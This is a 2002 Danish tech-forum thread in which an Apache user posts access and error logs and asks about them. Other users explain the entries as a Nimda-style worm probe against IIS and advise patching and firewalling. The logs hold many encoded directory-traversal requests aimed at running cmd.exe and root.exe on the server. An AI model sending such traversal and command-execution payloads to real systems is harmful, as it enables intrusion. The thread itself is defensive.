CIO Tech Eksperten IT-JOB IT-Kurser Events Podcast Søg

Log ind eller opret profil

Du kan også logge ind via nedenstående tjenester

angel_seraphiel Nybegynder

24. november 2002 - 22:36 Der er 7 kommentarer og
2 løsninger

Hvorfor står der det i min log?

62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

Hva' er det for noget ? :/

Synes godt om

angel_seraphiel Nybegynder

24. november 2002 - 22:38 #1

Min fejl-log ser sådan her ud:

[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/root.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/msadc/root.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/d/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..%5c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/msadc/..%5c/..%5c/..%5c/..Á/..Á/..Á/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..Á/winnt/system32/cmd.exe
[Sun Nov 24 14:41:23 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..À¯/winnt/system32/cmd.exe
[Sun Nov 24 14:41:23 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..Áœ/winnt/system32/cmd.exe
[Sun Nov 24 14:41:23 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..%5c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:23 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..%2f/winnt/system32/cmd.exe
[Sun Nov 24 19:48:47 2002] [error] [client 210.56.14.210] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Sun Nov 24 22:03:38 2002] [error] [client 213.221.189.10] File does not exist: f:/programmer/apache group/apache/htdocs//

Synes godt om

bufferzone Praktikant

24. november 2002 - 22:40 #2

Det ligner et nimbda angreb, eller et angreb fra en tilsvarende mail orm. Hvis du ikke har en mail eller web server kørende skal du ikke være bekymret.

Gennemscann lige dit system med en opdateret virus scanner for en sikkerheds skyld

Synes godt om

angel_seraphiel Nybegynder

24. november 2002 - 22:41 #3

bufferzone - har en apache kørende.. :(

Synes godt om

wise Seniormester

24. november 2002 - 22:42 #4

Der er nogle som har teste din apache server for at se om det var en IIS, og om de dermed kunne komme ind...
De har prøvet at se om de kunne få adgang til en CMD eller en root.exe (hvad så end det er...) CMD er jo en dos promt, så hvis det havde lykkedes dem at køre en dir, så havde de også kunnet køre en format c:\

Men men men alt ser godt ud, og din apche har ikke tilladt dem at køre disse filer

Synes godt om

wise Seniormester

24. november 2002 - 22:42 #5

Det er mig bekendt kun IIS der er såbar for dette angreb

Synes godt om

angel_seraphiel Nybegynder

24. november 2002 - 22:43 #6

wise - jamen hvis nu der kommer en rigtig ond hacker, hva' så ? jeg gider ik' det tis.. :/

Synes godt om

bufferzone Praktikant

24. november 2002 - 22:46 #7

Apache er ikke sårbar over for nimbda, men der findes sikkert mail orm der kan udnytte apache også. En ond hacker ville aldrig efterlade et så letgenkendeligt fingeraftryk.

Når du nu har en web server kørende, så kan vi godt tale sikkerhed.

Først skal du selvfølgelig have en firewall, og når du nu har en server kørende, så bør den kunne håndtere en DMZ, hvor din server så placeres

Synes godt om

erikjacobsen Ekspert

24. november 2002 - 22:47 #8

Pil netværksstikket ud på din 'puter - så er du fri for angreb.
Ellers kan du bare tage det som en oplevelse... ;)
Vi andre får dem også i massevis

Synes godt om

wise Seniormester

24. november 2002 - 22:48 #9

Jammen du holder vel selvfølgelig øje med om der findes huller i apache og hvis der gør, så lukker du da SELVFØLGELIG disse med det samme - det er jo derfor at der udsendes patches! Patchen som lapper IIS overfor et NIMDA angreb havde været ude i en del måneder inden angebene startede, så de maskiner der er blevet ramt er altså dem der ikke er blevet opdateret...
Den eneste 100% hackersikre løsning som findes er at klippe netkablet midt over.

Det næstbedste er at vælge en af de mere sikre webservere (fx apache fremfor IIS) og at sikre at de forskellige sikkerheds patches bliver opdateret relativt hurtigt efter at de bliver frigivet....

Synes godt om

Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Følg dette spørgsmål

Opret Preview

Se alle it-kurser fra Computerworld Kurser

IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Se alle it-kurser

Flere spørgsmål fra Andet sikkerhed kategorien

Titel	Indlæg	Oprettet	Seneste aktivitet
Bilkøb Af arnepedersen i Andet sikkerhed	7	15/11/202415:55	18/11/202412:57
ONVIF??? Af johnnylassen i Andet sikkerhed	9	22/10/202412:50	24/10/202410:00
Synology surveillance bogmærker. Af johnnylassen i Andet sikkerhed	2	30/09/202408:37	30/09/202409:48
Kode på USB nøgle Af Peter Olsen i Andet sikkerhed	13	29/09/202409:55	01/10/202418:15
Hjælp til wifi Af Kim1998 i Andet sikkerhed	2	07/09/202412:25	09/09/202409:37

Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester

Alle kategorier på Eksperten

Seneste artiklerRSS

15:59

Test: Den snusfornuftige Volkswagen ID.3 blevet til lidt af el-bisse

22/11

Vil købe tele-løsninger til det offentlige for 370 millioner kroner

22/11

Nørgaard: Det er de neuro-divergente originalers tid

22/11

Sker helt åbenlyst: Ansatte i den kinesiske stat sælger borgernes personlige data på hemmelige internet-fora

22/11

Efterspørgslen på AI-regnekraft er enorm - og det smitter af på priserne: "Vi kan sælge næsten alt, hvad vi får ind"

22/11

Derfor bliver den amerikanske tvangs-opdeling af Google nok ikke til noget

22/11

Nyt værtøj fra Microsoft: Snart kan du reparere nedbrudte Windows-enheder på distancen

22/11

Vi har fundet 10 ledige it-stillinger, som du kan søge netop nu

22/11

Politiet skriver kontrakt på 75 millioner kroner med dansk it-firma: Medarbejdere skal flytte ind hos politiet

22/11

Kombit gør klar til at købe it-konsulenter for 140 millioner kroner - her er planen

22/11

Droner i krig - sådan anvendes de mest effektivt på slagmarken

Vis flere artikler

IT-JOB

Envafors A/S

Leder af digitalisering og compliance

SporingsGruppen ApS

Backend-udvikler

Røde Kors

Dataanalytiker til Udvikling

Udviklings- og Forenklingsstyrelsen

Motiverende chefkonsulent med souschefopgaver til PMO Gældssystemer

IT & Co ApS

Systemkonsulent

Vis flere jobs

Seneste spørgsmål Seneste aktivitet

I dag 14:10	Outlook henter ikke mails Af TTA i Office & Kontorpakker
I dag 13:58	vise billeder i kartotek med store ikoner inklusive optagelsesdato Af Malm i Billedbehandling
I dag 13:35	Adobe Elements 2019, Organizer Crasher Af mort1 i Billedbehandling
I går 20:49	pop up black friday Af Malm i Virus
I går 18:31	Hvor finder jeg en netværksdriver? Af jcr18 i Wifi